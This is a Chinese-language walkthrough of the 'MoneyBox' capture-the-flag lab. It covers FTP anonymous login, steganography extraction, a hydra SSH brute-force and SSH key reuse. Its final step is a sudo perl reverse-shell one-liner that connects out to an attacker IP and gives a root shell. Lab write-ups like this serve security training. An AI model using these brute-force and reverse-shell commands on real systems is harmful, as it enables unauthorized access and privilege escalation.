信息收集
Difficulty : Easy
Goal : 3 flags(3个旗帜)
MAC地址:00:0C:29:D1:37:19
ip扫描
端口探测
发现ftp可以匿名登录
并且探测到里面有一个图片
└─$ sudo nmap -A -p- -sS -sC -T4 10.10.1.67
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-02 16:24 CST
Nmap scan report for bogon (10.10.1.67)
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.1.50
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1e30ce7281e0a23d5c28888b12acfaac (RSA)
| 256 019dfafbf20637c012fc018b248f53ae (ECDSA)
|_ 256 2f34b3d074b47f8d17d237b12e32f7eb (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:D1:37:19 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.18 ms bogon (10.10.1.67)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.94 seconds
渗透过程
ftp连接
ftp常见匿名账户密码anonymous anonymous
get下载到本地
打开是只喵在玩电脑(~喵)
这个图片里面有隐写
使用工具steghide查看其隐写
发现需要密码
这个端口就先搁置
看其他两个端口
访问80
扫描目录
dirsearch -u 10.10.1.67
有一个重定向链接
发现在其源码下有个秘密目录
the hint is the another secret directory is S3cr3t-T3xt
..Secret Key 3xtr4ctd4t4
有个密钥
可能是图片的那个密码
提取出来
steghide extract -sf trytofind.jpg
cat data.txt文件
说有一个用户renu
他的密码太弱了
然后尝试爆破
尝试使用九头蛇(hydra)爆破
hydra ssh://10.10.1.67 -l renu -P /home/kali/zidian/top1000.txt -vV -f -t 32
连接ssh并找到了第一个flag
看一下历史命令
history
发现执行过这些命令
ssh-keygen -t rsa 生成RSA类型的SSH密钥。
ssh-copy-id lily@192.168.43.80 将公钥复制到远程服务器上,以便进行无密码SSH登录。
chmod 400 id_rsa 更改id_rsa文件的权限为400,也就是只有文件所有者可以读取该文件。
ssh -i id_rsa lily@192.168.43.80 使用指定的密钥文件(id_rsa)通过SSH连接到远程服务器。
尝试ssh lily@192.168.43.80,发现不能登录,再仔细看看它进入了家目录在进入lily,说明机器上也有一个lily用户,所以尝试用127.0.0.1替换192.168.43.80
可以看到第二个flag在user2.txt文件下
查看一下sudo -l
有个prel
提权 shell反弹
sudo perl -e 'use Socket;$i="10.10.1.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
第三个flag已找到
到此结束